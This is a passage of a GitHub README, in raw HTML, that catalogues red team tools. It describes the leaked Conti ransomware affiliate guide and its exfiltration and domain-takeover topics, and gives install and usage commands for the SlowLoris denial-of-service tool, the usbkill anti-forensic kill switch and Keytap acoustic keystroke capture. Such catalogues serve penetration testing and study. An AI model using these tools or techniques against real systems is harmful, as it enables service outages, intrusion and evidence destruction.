(Too many could exceeed Google<span class="pl-s"><span class="pl-pds">'</span>s rate limit threshold)</span> <span class="pl-s"></span> <span class="pl-s"> -h, --help</span> <span class="pl-s"> show this help message and exit</span></pre></div> <p dir="auto">Nice <a href="https://antman1p-30185.medium.com/youre-a-gd-thief-1e02358fd557" rel="nofollow">blog post</a> explaining the logic behind the tool.</p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Impact</h1><a id="user-content-impact" class="anchor" aria-label="Permalink: Impact" href="#impact"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak">Conti Pentester Guide Leak</a></h3><a id="user-content-conti-pentester-guide-leak" class="anchor" aria-label="Permalink: 🔙Conti Pentester Guide Leak" href="#conti-pentester-guide-leak"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 
1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Conti is a ransomware group that is known for targeting large organizations and using sophisticated tactics to evade detection and maximize the impact of their attacks.</p> <p dir="auto">Conti has been responsible for a number of high-profile ransomware attacks, including ones against the computer systems of the City of Pensacola, Florida, and the computer systems of the Irish health service.</p> <p dir="auto">The <a href="https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak">Conti Pentester Guide Leak - Repository</a> contains leaked pentesting materials given to Conti ransomware group affiliates.</p> <p dir="auto">Topics include:</p> <ul dir="auto"> <li>Configuring Rclone with MEGA for data exfiltration</li> <li>Configuring AnyDesk as persistence and remote access into a victim’s network</li> <li>Elevating and gaining admin rights inside a company’s hacked network</li> <li>Taking over domain controllers</li> <li>Dumping passwords from Active Directory</li> </ul> <p dir="auto"><strong>Note:</strong> <em><a href="https://www.vx-underground.org/" rel="nofollow">vx-underground.org</a> obtained more training materials and tools used by Conti ransomware operators <a href="https://share.vx-underground.org/Conti/" rel="nofollow">here</a>.</em></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210856582-44a9bf16-23d4-4b7e-9e91-8604c3191e78.png"><img src="https://user-images.githubusercontent.com/100603074/210856582-44a9bf16-23d4-4b7e-9e91-8604c3191e78.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a 
href="https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak">https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/gkbrk/slowloris">SlowLoris</a></h3><a id="user-content-slowloris" class="anchor" aria-label="Permalink: 🔙SlowLoris" href="#slowloris"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Slowloris is a type of denial-of-service (DoS) attack that involves sending HTTP requests to a web server in a way that ties up the server's resources, preventing it from being able to process legitimate requests.</p> <p dir="auto">This attack would typically be conducted with a botnet; it is designed to be difficult to detect and mitigate, as it uses a relatively small number of connections and does not generate a large amount of traffic.</p> <p dir="auto"><strong>Install: (Pip)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo pip3 install slowloris"><pre>sudo pip3 install slowloris</pre></div> <p dir="auto"><strong>Install: (Git)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" 
data-snippet-clipboard-copy-content="git clone https://github.com/gkbrk/slowloris.git cd slowloris"><pre>git clone https://github.com/gkbrk/slowloris.git <span class="pl-c1">cd</span> slowloris</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Pip slowloris example.com # Git python3 slowloris.py example.com"><pre><span class="pl-c"><span class="pl-c">#</span> Pip</span> slowloris example.com <span class="pl-c"><span class="pl-c">#</span> Git</span> python3 slowloris.py example.com</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210115630-b6541ee0-ad82-471a-9a7e-7f0ec028c67d.png"><img src="https://user-images.githubusercontent.com/100603074/210115630-b6541ee0-ad82-471a-9a7e-7f0ec028c67d.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/hephaest0s/usbkill">usbkill</a></h3><a id="user-content-usbkill" class="anchor" aria-label="Permalink: 🔙usbkill" href="#usbkill"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">This is an anti-forensic kill-switch that waits for a change 
in USB port status, immediately shutting down the endpoint if a change is detected.</p> <p dir="auto">In some situations, it is imperative that no data is added to or removed from an endpoint via USB.</p> <p dir="auto">This is where USBkill comes in.</p> <p dir="auto"><strong>Install:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/hephaest0s/usbkill cd usbkill ./setup.py install"><pre class="notranslate"><code>git clone https://github.com/hephaest0s/usbkill cd usbkill ./setup.py install </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo python3 usbkill.py"><pre>sudo python3 usbkill.py</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/217654429-98efef6d-b70f-48b8-8979-228ce2f78932.png"><img src="https://user-images.githubusercontent.com/100603074/217654429-98efef6d-b70f-48b8-8979-228ce2f78932.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://en.wikipedia.org/wiki/USBKill" rel="nofollow">https://en.wikipedia.org/wiki/USBKill</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/ggerganov/kbd-audio">Keytap</a></h3><a id="user-content-keytap" class="anchor" aria-label="Permalink: 🔙Keytap" href="#keytap"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 
1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">This is a tool that can guess which keyboard keys were pressed from the audio captured by a computer's microphone.</p> <p dir="auto">Keytap2 can also be used to retrieve text from audio snippets of keyboard typing.</p> <p dir="auto"><strong>Install: (Build)</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/ggerganov/kbd-audio cd kbd-audio git submodule update --init mkdir build && cd build cmake .. make"><pre class="notranslate"><code>git clone https://github.com/ggerganov/kbd-audio cd kbd-audio git submodule update --init mkdir build && cd build cmake .. make </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Record audio to a raw binary file on disk ./record-full output.kbd [-cN] # Playback a recording captured via the record-full tool ./play-full input.kbd [-pN] # Record audio only while typing (Useful for collecting training data for keytap) ./record output.kbd [-cN] [-CN]"><pre><span class="pl-c"><span class="pl-c">#</span> Record audio to a raw binary file on disk</span> ./record-full output.kbd [-cN] <span class="pl-c"><span class="pl-c">#</span> Playback a recording captured via the record-full tool</span> ./play-full input.kbd [-pN] <span class="pl-c"><span class="pl-c">#</span> Record audio only while typing (Useful for collecting training data for keytap)</span> ./record output.kbd [-cN] [-CN]</pre></div> <p dir="auto">See full usage documentation <a 
href="https://github.com/ggerganov/kbd-audio#tool-details">here</a>.</p> <p dir="auto">Try the online demo at <a href="https://keytap.ggerganov.com/" rel="nofollow">https://keytap.ggerganov.com/</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/229649861-728e7ebb-ddb9-4347-9934-dd077d12bb41.png"><img src="https://user-images.githubusercontent.com/100603074/229649861-728e7ebb-ddb9-4347-9934-dd077d12bb41.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/ggerganov/kbd-audio">https://github.com/ggerganov/kbd-audio</a></em></p> </article></div></div></div></div></div> <!-- --> <!-- --> <script type="application/json" id="__PRIMER_DATA_:R0:__">{"resolvedServerColorMode":"day"}</script></div> </react-partial> <input type="hidden" data-csrf="true" value="C+d+6Mq6269lVRGHzdDbeODAl/tx9Wp5Ojo76I7BwBaWHzWvpPa8t9EkG4Td/JL1wEhwbwKrmcsa2rW/iD9Z8A==" /> </div> <div data-view-component="true" class="Layout-sidebar"> <div class="BorderGrid about-margin" data-pjax> <div class="BorderGrid-row"> <div class="BorderGrid-cell"> <div class="hide-sm hide-md"> <h2 class="mb-3 h4">About</h2> <p class="f4 my-3"> Tools and Techniques for Red Team / Penetration Testing </p> <h3 class="sr-only">Topics</h3> <div class="my-3"> <div class="f6"> <a href="/topics/windows" title="Topic: windows" data-view-component="true" class="topic-tag topic-tag-link"> windows </a> <a href="/topics/linux" title="Topic: linux" data-view-component="true" class="topic-tag topic-tag-link"> linux </a> <a href="/topics/tools" title="Topic: tools" data-view-component="true" class="topic-tag topic-tag-link"> tools </a> <a href="/topics/hacking" title="Topic: hacking" data-view-component="true" class="topic-tag topic-tag-link"> hacking </a> <a href="/topics/resources" title="Topic: resources" data-view-component="true" class="topic-tag topic-tag-link"> resources </a> <a 
data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path> </svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path> </svg> </clipboard-copy> </div> </template> </div> <div id="js-global-screen-reader-notice" class="sr-only mt-n1" aria-live="polite" aria-atomic="true" ></div> <div id="js-global-screen-reader-notice-assertive" class="sr-only mt-n1" aria-live="assertive" aria-atomic="true"></div> </body> </html>